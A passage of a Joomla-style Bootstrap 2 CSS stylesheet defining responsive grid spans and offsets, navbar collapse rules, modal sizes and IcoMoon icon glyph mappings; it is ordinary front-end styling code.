		width: 380px;
	}
	.span4 {
		width: 300px;
	}
	.span3 {
		width: 220px;
	}
	.span2 {
		width: 140px;
	}
	.span1 {
		width: 60px;
	}
	.offset12 {
		margin-left: 980px;
	}
	.offset11 {
		margin-left: 900px;
	}
	.offset10 {
		margin-left: 820px;
	}
	.offset9 {
		margin-left: 740px;
	}
	.offset8 {
		margin-left: 660px;
	}
	.offset7 {
		margin-left: 580px;
	}
	.offset6 {
		margin-left: 500px;
	}
	.offset5 {
		margin-left: 420px;
	}
	.offset4 {
		margin-left: 340px;
	}
	.offset3 {
		margin-left: 260px;
	}
	.offset2 {
		margin-left: 180px;
	}
	.offset1 {
		margin-left: 100px;
	}
	.row-fluid {
		width: 100%;
		*zoom: 1;
	}
	.row-fluid:before,
	.row-fluid:after {
		display: table;
		content: "";
		line-height: 0;
	}
	.row-fluid:after {
		clear: both;
	}
	.row-fluid [class*="span"] {
		display: block;
		width: 100%;
		min-height: 28px;
		-webkit-box-sizing: border-box;
		-moz-box-sizing: border-box;
		box-sizing: border-box;
		float: left;
		margin-left: 2.127659574%;
		*margin-left: 2.0744680846383%;
	}
	.row-fluid [class*="span"]:first-child {
		margin-left: 0;
	}
	.row-fluid .controls-row [class*="span"] + [class*="span"] {
		margin-left: 2.127659574%;
	}
	.row-fluid .span12 {
		width: 99.99999999%;
		*width: 99.946808500638%;
	}
	.row-fluid .span11 {
		width: 91.489361693%;
		*width: 91.436170203638%;
	}
	.row-fluid .span10 {
		width: 82.978723396%;
		*width: 82.925531906638%;
	}
	.row-fluid .span9 {
		width: 74.468085099%;
		*width: 74.414893609638%;
	}
	.row-fluid .span8 {
		width: 65.957446802%;
		*width: 65.904255312638%;
	}
	.row-fluid .span7 {
		width: 57.446808505%;
		*width: 57.393617015638%;
	}
	.row-fluid .span6 {
		width: 48.936170208%;
		*width: 48.882978718638%;
	}
	.row-fluid .span5 {
		width: 40.425531911%;
		*width: 40.372340421638%;
	}
	.row-fluid .span4 {
		width: 31.914893614%;
		*width: 31.861702124638%;
	}
	.row-fluid .span3 {
		width: 23.404255317%;
		*width: 23.351063827638%;
	}
	.row-fluid .span2 {
		width: 14.89361702%;
		*width: 14.840425530638%;
	}
	.row-fluid .span1 {
		width: 6.382978723%;
		*width: 6.3297872336383%;
	}
	.row-fluid .offset12 {
		margin-left: 104.255319138%;
		*margin-left: 104.14893615928%;
	}
	.row-fluid .offset12:first-child {
		margin-left: 102.127659564%;
		*margin-left: 102.02127658528%;
	}
	.row-fluid .offset11 {
		margin-left: 95.744680841%;
		*margin-left: 95.638297862277%;
	}
	.row-fluid .offset11:first-child {
		margin-left: 93.617021267%;
		*margin-left: 93.510638288277%;
	}
	.row-fluid .offset10 {
		margin-left: 87.234042544%;
		*margin-left: 87.127659565277%;
	}
	.row-fluid .offset10:first-child {
		margin-left: 85.10638297%;
		*margin-left: 84.999999991277%;
	}
	.row-fluid .offset9 {
		margin-left: 78.723404247%;
		*margin-left: 78.617021268277%;
	}
	.row-fluid .offset9:first-child {
		margin-left: 76.595744673%;
		*margin-left: 76.489361694277%;
	}
	.row-fluid .offset8 {
		margin-left: 70.21276595%;
		*margin-left: 70.106382971277%;
	}
	.row-fluid .offset8:first-child {
		margin-left: 68.085106376%;
		*margin-left: 67.978723397277%;
	}
	.row-fluid .offset7 {
		margin-left: 61.702127653%;
		*margin-left: 61.595744674277%;
	}
	.row-fluid .offset7:first-child {
		margin-left: 59.574468079%;
		*margin-left: 59.468085100277%;
	}
	.row-fluid .offset6 {
		margin-left: 53.191489356%;
		*margin-left: 53.085106377277%;
	}
	.row-fluid .offset6:first-child {
		margin-left: 51.063829782%;
		*margin-left: 50.957446803277%;
	}
	.row-fluid .offset5 {
		margin-left: 44.680851059%;
		*margin-left: 44.574468080277%;
	}
	.row-fluid .offset5:first-child {
		margin-left: 42.553191485%;
		*margin-left: 42.446808506277%;
	}
	.row-fluid .offset4 {
		margin-left: 36.170212762%;
		*margin-left: 36.063829783277%;
	}
	.row-fluid .offset4:first-child {
		margin-left: 34.042553188%;
		*margin-left: 33.936170209277%;
	}
	.row-fluid .offset3 {
		margin-left: 27.659574465%;
		*margin-left: 27.553191486277%;
	}
	.row-fluid .offset3:first-child {
		margin-left: 25.531914891%;
		*margin-left: 25.425531912277%;
	}
	.row-fluid .offset2 {
		margin-left: 19.148936168%;
		*margin-left: 19.042553189277%;
	}
	.row-fluid .offset2:first-child {
		margin-left: 17.021276594%;
		*margin-left: 16.914893615277%;
	}
	.row-fluid .offset1 {
		margin-left: 10.638297871%;
		*margin-left: 10.531914892277%;
	}
	.row-fluid .offset1:first-child {
		margin-left: 8.510638297%;
		*margin-left: 8.4042553182766%;
	}
	input,
	textarea,
	.uneditable-input {
		margin-left: 0;
	}
	.controls-row [class*="span"] + [class*="span"] {
		margin-left: 20px;
	}
	input.span12,
	textarea.span12,
	.uneditable-input.span12 {
		width: 926px;
	}
	input.span11,
	textarea.span11,
	.uneditable-input.span11 {
		width: 846px;
	}
	input.span10,
	textarea.span10,
	.uneditable-input.span10 {
		width: 766px;
	}
	input.span9,
	textarea.span9,
	.uneditable-input.span9 {
		width: 686px;
	}
	input.span8,
	textarea.span8,
	.uneditable-input.span8 {
		width: 606px;
	}
	input.span7,
	textarea.span7,
	.uneditable-input.span7 {
		width: 526px;
	}
	input.span6,
	textarea.span6,
	.uneditable-input.span6 {
		width: 446px;
	}
	input.span5,
	textarea.span5,
	.uneditable-input.span5 {
		width: 366px;
	}
	input.span4,
	textarea.span4,
	.uneditable-input.span4 {
		width: 286px;
	}
	input.span3,
	textarea.span3,
	.uneditable-input.span3 {
		width: 206px;
	}
	input.span2,
	textarea.span2,
	.uneditable-input.span2 {
		width: 126px;
	}
	input.span1,
	textarea.span1,
	.uneditable-input.span1 {
		width: 46px;
	}
	.thumbnails {
		margin-left: -20px;
	}
	.thumbnails > li {
		margin-left: 20px;
	}
	.row-fluid .thumbnails {
		margin-left: 0;
	}
}
@media (max-width: 979px) {
	body {
		padding-top: 0;
	}
	.navbar-fixed-top,
	.navbar-fixed-bottom {
		position: static;
	}
	.navbar-fixed-top {
		margin-bottom: 18px;
	}
	.navbar-fixed-bottom {
		margin-top: 18px;
	}
	.navbar-fixed-top .navbar-inner,
	.navbar-fixed-bottom .navbar-inner {
		padding: 5px;
	}
	.navbar .container {
		width: auto;
		padding: 0;
	}
	.navbar .brand {
		padding-left: 10px;
		padding-right: 10px;
		margin: 0 0 0 -5px;
	}
	.nav-collapse {
		clear: both;
	}
	.nav-collapse .nav {
		float: none;
		margin: 0 0 9px;
	}
	.nav-collapse .nav > li {
		float: none;
	}
	.nav-collapse .nav > li > a {
		margin-bottom: 2px;
	}
	.nav-collapse .nav > .divider-vertical {
		display: none;
	}
	.nav-collapse .nav .nav-header {
		color: #555;
		text-shadow: none;
	}
	.nav-collapse .nav > li > a,
	.nav-collapse .dropdown-menu a {
		padding: 9px 15px;
		font-weight: bold;
		color: #555;
		-webkit-border-radius: 3px;
		-moz-border-radius: 3px;
		border-radius: 3px;
	}
	.nav-collapse .btn {
		padding: 4px 10px 4px;
		font-weight: normal;
		-webkit-border-radius: 4px;
		-moz-border-radius: 4px;
		border-radius: 4px;
	}
	.nav-collapse .dropdown-menu li + li a {
		margin-bottom: 2px;
	}
	.nav-collapse .nav > li > a:hover,
	.nav-collapse .nav > li > a:focus,
	.nav-collapse .dropdown-menu a:hover,
	.nav-collapse .dropdown-menu a:focus {
		background-color: #f2f2f2;
	}
	.navbar-inverse .nav-collapse .nav > li > a,
	.navbar-inverse .nav-collapse .dropdown-menu a {
		color: #999;
	}
	.navbar-inverse .nav-collapse .nav > li > a:hover,
	.navbar-inverse .nav-collapse .nav > li > a:focus,
	.navbar-inverse .nav-collapse .dropdown-menu a:hover,
	.navbar-inverse .nav-collapse .dropdown-menu a:focus {
		background-color: #111111;
	}
	.nav-collapse.in .btn-group {
		margin-top: 5px;
		padding: 0;
	}
	.nav-collapse .dropdown-menu {
		position: static;
		top: auto;
		left: auto;
		float: none;
		display: none;
		max-width: none;
		margin: 0 15px;
		padding: 0;
		background-color: transparent;
		border: none;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		-webkit-box-shadow: none;
		-moz-box-shadow: none;
		box-shadow: none;
	}
	.nav-collapse .open > .dropdown-menu {
		display: block;
	}
	.nav-collapse .dropdown-menu:before,
	.nav-collapse .dropdown-menu:after {
		display: none;
	}
	.nav-collapse .dropdown-menu .divider {
		display: none;
	}
	.nav-collapse .nav > li > .dropdown-menu:before,
	.nav-collapse .nav > li > .dropdown-menu:after {
		display: none;
	}
	.nav-collapse .navbar-form,
	.nav-collapse .navbar-search {
		float: none;
		padding: 9px 15px;
		margin: 9px 0;
		border-top: 1px solid #f2f2f2;
		border-bottom: 1px solid #f2f2f2;
		-webkit-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
		-moz-box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
		box-shadow: inset 0 1px 0 rgba(255,255,255,.1), 0 1px 0 rgba(255,255,255,.1);
	}
	.navbar-inverse .nav-collapse .navbar-form,
	.navbar-inverse .nav-collapse .navbar-search {
		border-top-color: #111111;
		border-bottom-color: #111111;
	}
	.navbar .nav-collapse .nav.pull-right {
		float: none;
		margin-left: 0;
	}
	.nav-collapse,
	.nav-collapse.collapse {
		overflow: hidden;
		height: 0;
	}
	.navbar .btn-navbar {
		display: block;
	}
	.navbar-static .navbar-inner {
		padding-left: 10px;
		padding-right: 10px;
	}
}
@media (min-width: 980px) {
	.nav-collapse.collapse {
		height: auto !important;
		overflow: visible !important;
	}
}
.small {
	font-size: 11px;
}
iframe,
svg {
	max-width: 100%;
}
.nowrap {
	white-space: nowrap;
}
.center,
.table td.center,
.table th.center {
	text-align: center;
}
a.disabled,
a.disabled:hover {
	color: #999999;
	background-color: transparent;
	cursor: default;
	text-decoration: none;
}
.hero-unit {
	text-align: center;
}
.hero-unit .lead {
	margin-bottom: 18px;
	font-size: 20px;
	font-weight: 200;
	line-height: 27px;
}
.btn .caret {
	margin-bottom: 7px;
}
.btn.btn-micro .caret {
	margin: 5px 0;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
body.modal {
	padding-top: 0;
}
.row-even,
.row-odd {
	padding: 5px;
	width: 99%;
	border-bottom: 1px solid #ddd;
}
.row-odd {
	background-color: transparent;
}
.row-even {
	background-color: #f9f9f9;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
.row-fluid .row-reveal {
	visibility: hidden;
}
.row-fluid:hover .row-reveal {
	visibility: visible;
}
.btn-wide {
	width: 80%;
}
.nav-list > li.offset > a {
	padding-left: 30px;
	font-size: 12px;
}
.blog-row-rule,
.blog-item-rule {
	border: 0;
}
.row-fluid .offset1 {
	margin-left: 8.382978723%;
}
.row-fluid .offset2 {
	margin-left: 16.89361702%;
}
.row-fluid .offset3 {
	margin-left: 25.404255317%;
}
.row-fluid .offset4 {
	margin-left: 33.914893614%;
}
.row-fluid .offset5 {
	margin-left: 42.425531911%;
}
.row-fluid .offset6 {
	margin-left: 50.93617020799999%;
}
.row-fluid .offset7 {
	margin-left: 59.446808505%;
}
.row-fluid .offset8 {
	margin-left: 67.95744680199999%;
}
.row-fluid .offset9 {
	margin-left: 76.468085099%;
}
.row-fluid .offset10 {
	margin-left: 84.97872339599999%;
}
.row-fluid .offset11 {
	margin-left: 91.489361693%;
}
.navbar .nav > li > a.btn {
	padding: 4px 10px;
	line-height: 18px;
}
.nav-tabs.nav-dark {
	border-bottom: 1px solid #333;
	text-shadow: 1px 1px 1px #000;
}
.nav-tabs.nav-dark > li > a {
	color: #F8F8F8;
}
.nav-tabs.nav-dark > li > a:hover {
	border-color: #333 #333 #111;
	background-color: #777777;
}
.nav-tabs.nav-dark > .active > a,
.nav-tabs.nav-dark > .active > a:hover {
	color: #ffffff;
	background-color: #555555;
	border: 1px solid #222;
	border-bottom-color: transparent;
}
.thumbnail.pull-left {
	margin: 0 10px 10px 0;
}
.thumbnail.pull-right {
	margin: 0 0 10px 10px;
}
.width-10 {
	width: 10px;
}
.width-20 {
	width: 20px;
}
.width-30 {
	width: 30px;
}
.width-40 {
	width: 40px;
}
.width-50 {
	width: 50px;
}
.width-60 {
	width: 60px;
}
.width-70 {
	width: 70px;
}
.width-80 {
	width: 80px;
}
.width-90 {
	width: 90px;
}
.width-100 {
	width: 100px;
}
.height-10 {
	height: 10px;
}
.height-20 {
	height: 20px;
}
.height-30 {
	height: 30px;
}
.height-40 {
	height: 40px;
}
.height-50 {
	height: 50px;
}
.height-60 {
	height: 60px;
}
.height-70 {
	height: 70px;
}
.height-80 {
	height: 80px;
}
.height-90 {
	height: 90px;
}
.height-100 {
	height: 100px;
}
hr.hr-condensed {
	margin: 10px 0;
}
.list-striped,
.row-striped {
	list-style: none;
	line-height: 18px;
	text-align: left;
	vertical-align: middle;
	border-top: 1px solid #ddd;
	margin-left: 0;
}
.list-striped li,
.list-striped dd,
.row-striped .row,
.row-striped .row-fluid {
	border-bottom: 1px solid #ddd;
	padding: 8px;
}
.list-striped li:nth-child(odd),
.list-striped dd:nth-child(odd),
.row-striped .row:nth-child(odd),
.row-striped .row-fluid:nth-child(odd) {
	background-color: #f9f9f9;
}
.list-striped li:hover,
.list-striped dd:hover,
.row-striped .row:hover,
.row-striped .row-fluid:hover {
	background-color: #f5f5f5;
}
.row-striped .row-fluid {
	width: 100%;
	box-sizing: border-box;
}
.row-striped .row-fluid [class*="span"] {
	min-height: 10px;
}
.row-striped .row-fluid [class*="span"] {
	margin-left: 8px;
}
.row-striped .row-fluid [class*="span"]:first-child {
	margin-left: 0;
}
.list-condensed li {
	padding: 4px 5px;
}
.row-condensed .row,
.row-condensed .row-fluid {
	padding: 4px 5px;
}
.list-bordered,
.row-bordered {
	list-style: none;
	line-height: 18px;
	text-align: left;
	vertical-align: middle;
	margin-left: 0;
	border: 1px solid #ddd;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
}
.radio.btn-group input[type=radio] {
	display: none;
}
.radio.btn-group > label {
	-webkit-user-select: none;
	-moz-user-select: none;
	-ms-user-select: none;
	user-select: none;
}
.radio.btn-group > label:first-of-type {
	margin-left: 0;
	-webkit-border-bottom-left-radius: 4px;
	border-bottom-left-radius: 4px;
	-webkit-border-top-left-radius: 4px;
	border-top-left-radius: 4px;
	-moz-border-radius-bottomleft: 4px;
	-moz-border-radius-topleft: 4px;
}
fieldset.radio.btn-group {
	padding-left: 0;
}
.iframe-bordered {
	border: 1px solid #ddd;
}
.tab-content {
	overflow: visible;
}
.tabs-left .tab-content {
	overflow: auto;
}
.nav-tabs > li > span {
	display: block;
	margin-right: 2px;
	padding-right: 12px;
	padding-left: 12px;
	padding-top: 8px;
	padding-bottom: 8px;
	line-height: 18px;
	border: 1px solid transparent;
	-webkit-border-radius: 4px 4px 0 0;
	-moz-border-radius: 4px 4px 0 0;
	border-radius: 4px 4px 0 0;
}
.btn-micro {
	padding: 1px 4px;
	font-size: 10px;
	line-height: 8px;
}
.btn-group > .btn-micro {
	font-size: 10px;
}
.tip-wrap {
	max-width: 200px;
	padding: 3px 8px;
	color: #fff;
	text-align: center;
	text-decoration: none;
	background-color: #000;
	-webkit-border-radius: 4px;
	-moz-border-radius: 4px;
	border-radius: 4px;
	z-index: 100;
}
.page-header {
	margin: 2px 0px 10px 0px;
	padding-bottom: 5px;
}
.input-prepend > .add-on,
.input-append > .add-on {
	vertical-align: top;
}
.input-prepend .chzn-container-single .chzn-single {
	-webkit-border-radius: 0 3px 3px 0;
	-moz-border-radius: 0 3px 3px 0;
	border-radius: 0 3px 3px 0;
}
.input-prepend .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 0 3px 0 0;
	-moz-border-radius: 0 3px 0 0;
	border-radius: 0 3px 0 0;
}
.input-append .chzn-container-single .chzn-single {
	-webkit-border-radius: 3px 0 0 3px;
	-moz-border-radius: 3px 0 0 3px;
	border-radius: 3px 0 0 3px;
}
.input-append .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 3px 0 0 0;
	-moz-border-radius: 3px 0 0 0;
	border-radius: 3px 0 0 0;
}
.input-prepend.input-append .chzn-container-single .chzn-single,
.input-prepend.input-append .chzn-container-single .chzn-single-with-drop {
	-webkit-border-radius: 0;
	-moz-border-radius: 0;
	border-radius: 0;
}
.element-invisible {
	position: absolute;
	padding: 0;
	margin: 0;
	border: 0;
	height: 1px;
	width: 1px;
	overflow: hidden;
}
.element-invisible:focus {
	width: auto;
	height: auto;
	overflow: auto;
	background: #eee;
	color: #000;
	padding: 1em;
}
.form-vertical .control-label {
	float: none;
	width: auto;
	padding-right: 0;
	padding-top: 0;
	text-align: left;
}
.form-vertical .controls {
	margin-left: 0;
}
.width-auto {
	width: auto;
}
.btn-group .chzn-results {
	white-space: normal;
}
.accordion-body.in:hover {
	overflow: visible;
}
.invalid {
	color: #9d261d;
	font-weight: bold;
}
input.invalid {
	border: 1px solid #9d261d;
	background: #f2dede;
}
select.chzn-done.invalid + .chzn-container.chzn-container-single > a.chzn-single,
select.chzn-done.invalid + .chzn-container.chzn-container-multi > ul.chzn-choices {
	border-color: #9d261d;
	color: #9d261d;
}
.tooltip {
	max-width: 400px;
}
.tooltip-inner {
	max-width: none;
	text-align: left;
	text-shadow: none;
}
th .tooltip-inner {
	font-weight: normal;
}
.tooltip.hasimage {
	opacity: 1;
}
.tip-text {
	text-align: left;
}
.btn-group > .btn + .dropdown-backdrop + .btn {
	margin-left: -1px;
}
.btn-group > .btn + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 8px;
	padding-right: 8px;
	-webkit-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	-moz-box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	box-shadow: inset 1px 0 0 rgba(255,255,255,.125), inset 0 1px 0 rgba(255,255,255,.2), 0 1px 2px rgba(0,0,0,.05);
	*padding-top: 5px;
	*padding-bottom: 5px;
}
.btn-group > .btn-mini + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 5px;
	padding-right: 5px;
	*padding-top: 2px;
	*padding-bottom: 2px;
}
.btn-group > .btn-small + .dropdown-backdrop + .dropdown-toggle {
	*padding-top: 5px;
	*padding-bottom: 4px;
}
.btn-group > .btn-large + .dropdown-backdrop + .dropdown-toggle {
	padding-left: 12px;
	padding-right: 12px;
	*padding-top: 7px;
	*padding-bottom: 7px;
}
.dropdown-menu {
	text-align: left;
}
.alert-link {
	font-weight: bold;
}
.alert .alert-link {
	color: #a47e3c;
}
.alert-success .alert-link {
	color: #356635;
}
.alert-danger .alert-link,
.alert-error .alert-link {
	color: #953b39;
}
.alert-info .alert-link {
	color: #2d6987;
}
div.modal {
	position: fixed;
	top: 5%;
	left: 50%;
	z-index: 1050;
	width: 80%;
	margin-left: -40%;
	background-color: #fff;
	border: 1px solid #999;
	border: 1px solid rgba(0,0,0,0.3);
	*border: 1px solid #999;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	-moz-box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	box-shadow: 0 3px 7px rgba(0,0,0,0.3);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding-box;
	background-clip: padding-box;
	outline: none;
}
div.modal.fade {
	-webkit-transition: opacity .3s linear, top .3s ease-out;
	-moz-transition: opacity .3s linear, top .3s ease-out;
	-o-transition: opacity .3s linear, top .3s ease-out;
	transition: opacity .3s linear, top .3s ease-out;
	top: -25%;
}
div.modal.fade.in {
	top: 5%;
}
.modal-batch {
	overflow-y: visible;
}
.modal-body[class^="jviewport-height"],
.modal-body[class*="jviewport-height"] {
	max-height: none;
}
.jviewport-height10 {
	height: 10vh;
}
.jviewport-height20 {
	height: 20vh;
}
.jviewport-height30 {
	height: 30vh;
}
.jviewport-height40 {
	height: 40vh;
}
.jviewport-height50 {
	height: 50vh;
}
.jviewport-height60 {
	height: 60vh;
}
.jviewport-height70 {
	height: 70vh;
}
.jviewport-height80 {
	height: 80vh;
}
.jviewport-height90 {
	height: 90vh;
}
.jviewport-height100 {
	height: 100vh;
}
div.modal.jviewport-width10 {
	width: 10vw;
	margin-left: -5vw;
}
div.modal.jviewport-width20 {
	width: 20vw;
	margin-left: -10vw;
}
div.modal.jviewport-width30 {
	width: 30vw;
	margin-left: -15vw;
}
div.modal.jviewport-width40 {
	width: 40vw;
	margin-left: -20vw;
}
div.modal.jviewport-width50 {
	width: 50vw;
	margin-left: -25vw;
}
div.modal.jviewport-width60 {
	width: 60vw;
	margin-left: -30vw;
}
div.modal.jviewport-width70 {
	width: 70vw;
	margin-left: -35vw;
}
div.modal.jviewport-width80 {
	width: 80vw;
	margin-left: -40vw;
}
div.modal.jviewport-width90 {
	width: 90vw;
	margin-left: -45vw;
}
div.modal.jviewport-width100 {
	width: 100vw;
	margin-left: -50vw;
}
@media (max-width: 767px) {
	div.modal {
		position: fixed;
		top: 20px;
		left: 20px;
		right: 20px;
		width: auto;
		margin: 0;
	}
	div.modal.fade {
		top: -100px;
	}
	div.modal.fade.in {
		top: 20px;
	}
	div.modal[class*="jviewport-width"] {
		width: auto;
		margin: 0;
	}
}
@media (max-width: 480px) {
	div.modal {
		top: 10px;
		left: 10px;
		right: 10px;
	}
}
@font-face {
	font-family: 'IcoMoon';
	src: url('../../../media/jui/fonts/IcoMoon.eot');
	src: url('../../../media/jui/fonts/IcoMoon.eot?#iefix') format('embedded-opentype'), url('../../../media/jui/fonts/IcoMoon.woff') format('woff'), url('../../../media/jui/fonts/IcoMoon.ttf') format('truetype'), url('../../../media/jui/fonts/IcoMoon.svg#IcoMoon') format('svg');
	font-weight: normal;
	font-style: normal;
}
[data-icon]:before {
	font-family: 'IcoMoon';
	content: attr(data-icon);
	speak: none;
}
[class^="icon-"],
[class*=" icon-"] {
	display: inline-block;
	width: 14px;
	height: 14px;
	margin-right: .25em;
	line-height: 14px;
}
[class^="icon-"]:before,
[class*=" icon-"]:before {
	font-family: 'IcoMoon';
	font-style: normal;
	speak: none;
}
[class^="icon-"].disabled,
[class*=" icon-"].disabled {
	font-weight: normal;
}
.icon-joomla:before {
	content: "\e200";
}
.icon-chevron-up:before,
.icon-uparrow:before,
.icon-arrow-up:before {
	content: "\e005";
}
.icon-chevron-right:before,
.icon-rightarrow:before,
.icon-arrow-right:before {
	content: "\e006";
}
.icon-chevron-down:before,
.icon-downarrow:before,
.icon-arrow-down:before {
	content: "\e007";
}
.icon-chevron-left:before,
.icon-leftarrow:before,
.icon-arrow-left:before {
	content: "\e008";
}
.icon-arrow-first:before {
	content: "\e003";
}
.icon-arrow-last:before {
	content: "\e004";
}
.icon-arrow-up-2:before {
	content: "\e009";
}
.icon-arrow-right-2:before {
	content: "\e00a";
}
.icon-arrow-down-2:before {
	content: "\e00b";
}
.icon-arrow-left-2:before {
	content: "\e00c";
}
.icon-arrow-up-3:before {
	content: "\e00f";
}
.icon-arrow-right-3:before {
	content: "\e010";
}
.icon-arrow-down-3:before {
	content: "\e011";
}
.icon-arrow-left-3:before {
	content: "\e012";
}
.icon-menu-2:before {
	content: "\e00e";
}
.icon-arrow-up-4:before {
	content: "\e201";
}
.icon-arrow-right-4:before {
	content: "\e202";
}
.icon-arrow-down-4:before {
	content: "\e203";
}
.icon-arrow-left-4:before {
	content: "\e204";
}
.icon-share:before,
.icon-redo:before {
	content: "\27";
}
.icon-undo:before {
	content: "\28";
}
.icon-forward-2:before {
	content: "\e205";
}
.icon-backward-2:before,
.icon-reply:before {
	content: "\e206";
}
.icon-unblock:before,
.icon-refresh:before,
.icon-redo-2:before {
	content: "\6c";
}
.icon-undo-2:before {
	content: "\e207";
}
.icon-move:before {
	content: "\7a";
}
.icon-expand:before {
	content: "\66";
}
.icon-contract:before {
	content: "\67";
}
.icon-expand-2:before {
	content: "\68";
}
.icon-contract-2:before {
	content: "\69";
}
.icon-play:before {
	content: "\e208";
}
.icon-pause:before {
	content: "\e209";
}
.icon-stop:before {
	content: "\e210";
}
.icon-previous:before,
.icon-backward:before {
	content: "\7c";
}
.icon-next:before,
.icon-forward:before {
	content: "\7b";
}
.icon-first:before {
	content: "\7d";
}
.icon-last:before {
	content: "\e000";
}
.icon-play-circle:before {
	content: "\e00d";
}
.icon-pause-circle:before {
	content: "\e211";
}
.icon-stop-circle:before {
	content: "\e212";
}
.icon-backward-circle:before {
	content: "\e213";
}
.icon-forward-circle:before {
	content: "\e214";
}
.icon-loop:before {
	content: "\e001";
}
.icon-shuffle:before {
	content: "\e002";
}
.icon-search:before {
	content: "\53";
}
.icon-zoom-in:before {
	content: "\64";
}
.icon-zoom-out:before {
	content: "\65";
}
.icon-apply:before,
.icon-edit:before,
.icon-pencil:before {
	content: "\2b";
}
.icon-pencil-2:before {
	content: "\2c";
}
.icon-brush:before {
	content: "\3b";
}
.icon-save-new:before,
.icon-plus-2:before {
	content: "\5d";
}
.icon-minus-sign:before,
.icon-minus-2:before {
	content: "\5e";
}
.icon-delete:before,
.icon-remove:before,
.icon-cancel-2:before {
	content: "\49";
}
.icon-publish:before,
.icon-save:before,
.icon-ok:before,
.icon-checkmark:before {
	content: "\47";
}
.icon-new:before,
.icon-plus:before {
	content: "\2a";
}
.icon-plus-circle:before {
	content: "\e215";
}
.icon-minus:before,
.icon-not-ok:before {
	content: "\4b";
}
.icon-ban-circle:before,
.icon-minus-circle:before {
	content: "\e216";
}
.icon-unpublish:before,
.icon-cancel:before {
	content: "\4a";
}
.icon-cancel-circle:before {
	content: "\e217";
}
.icon-checkmark-2:before {
	content: "\e218";
}
.icon-checkmark-circle:before {
	content: "\e219";
}
.icon-info:before {
	content: "\e220";
}
.icon-info-2:before,
.icon-info-circle:before {
	content: "\e221";
}
.icon-question:before,
.icon-question-sign:before,
.icon-help:before {
	content: "\45";
}
.icon-question-2:before,
.icon-question-circle:before {
	content: "\e222";
}
.icon-notification:before {
	content: "\e223";
}
.icon-notification-2:before,
.icon-notification-circle:before {
	content: "\e224";
}
.icon-pending:before,
.icon-warning:before {
	content: "\48";
}
.icon-warning-2:before,
.icon-warning-circle:before {
	content: "\e225";
}
.icon-checkbox-unchecked:before {
	content: "\3d";
}
.icon-checkin:before,
.icon-checkbox:before,
.icon-checkbox-checked:before {
	content: "\3e";
}
.icon-checkbox-partial:before {
	content: "\3f";
}
.icon-square:before {
	content: "\e226";
}
.icon-radio-unchecked:before {
	content: "\e227";
}
.icon-radio-checked:before,
.icon-generic:before {
	content: "\e228";
}
.icon-circle:before {
	content: "\e229";
}
.icon-signup:before {
	content: "\e230";
}
.icon-grid:before,
.icon-grid-view:before {
	content: "\58";
}
.icon-grid-2:before,
.icon-grid-view-2:before {
	content: "\59";
}
.icon-menu:before {
	content: "\5a";
}
.icon-list:before,
.icon-list-view:before {
	content: "\31";
}
.icon-list-2:before {
	content: "\e231";
}
.icon-menu-3:before {
	content: "\e232";
}
.icon-folder-open:before,
.icon-folder:before {
	content: "\2d";
}
.icon-folder-close:before,
.icon-folder-2:before {
	content: "\2e";
}
.icon-folder-plus:before {
	content: "\e234";
}
.icon-folder-minus:before {
	content: "\e235";
}
.icon-folder-3:before {
	content: "\e236";
}
.icon-folder-plus-2:before {
	content: "\e237";
}
.icon-folder-remove:before {
	content: "\e238";
}
.icon-file:before {
	content: "\e016";
}
.icon-file-2:before {
	content: "\e239";
}
.icon-file-add:before,
.icon-file-plus:before {
	content: "\29";
}
.icon-file-minus:before {
	content: "\e017";
}
.icon-file-check:before {
	content: "\e240";
}
.icon-file-remove:before {
	content: "\e241";
}
.icon-save-copy:before,
.icon-copy:before {
	content: "\e018";
}
.icon-stack:before {
	content: "\e242";
}
.icon-tree:before {
	content: "\e243";
}
.icon-tree-2:before {
	content: "\e244";
}
.icon-paragraph-left:before {
	content: "\e246";
}
.icon-paragraph-center:before {
	content: "\e247";
}
.icon-paragraph-right:before {
	content: "\e248";
}
.icon-paragraph-justify:before {
	content: "\e249";
}
.icon-screen:before {
	content: "\e01c";
}
.icon-tablet:before {
	content: "\e01d";
}
.icon-mobile:before {
	content: "\e01e";
}
.icon-box-add:before {
	content: "\51";
}
.icon-box-remove:before {
	content: "\52";
}
.icon-download:before {
	content: "\e021";
}
.icon-upload:before {
	content: "\e022";
}
.icon-home:before {
	content: "\21";
}
.icon-home-2:before {
	content: "\e250";
}
.icon-out-2:before,
.icon-new-tab:before {
	content: "\e024";
}
.icon-out-3:before,
.icon-new-tab-2:before {
	content: "\e251";
}
.icon-link:before {
	content: "\e252";
}
.icon-picture:before,
.icon-image:before {
	content: "\2f";
}
.icon-pictures:before,
.icon-images:before {
	content: "\30";
}
.icon-palette:before,
.icon-color-palette:before {
	content: "\e014";
}
.icon-camera:before {
	content: "\55";
}
.icon-camera-2:before,
.icon-video:before {
	content: "\e015";
}
.icon-play-2:before,
.icon-video-2:before,
.icon-youtube:before {
	content: "\56";
}
.icon-music:before {
	content: "\57";
}
.icon-user:before {
	content: "\22";
}
.icon-users:before {
	content: "\e01f";
}
.icon-vcard:before {
	content: "\6d";
}
.icon-address:before {
	content: "\70";
}
.icon-share-alt:before,
.icon-out:before {
	content: "\26";
}
.icon-enter:before {
	content: "\e257";
}
.icon-exit:before {
	content: "\e258";
}
.icon-comment:before,
.icon-comments:before {
	content: "\24";
}
.icon-comments-2:before {
	content: "\25";
}
.icon-quote:before,
.icon-quotes-left:before {
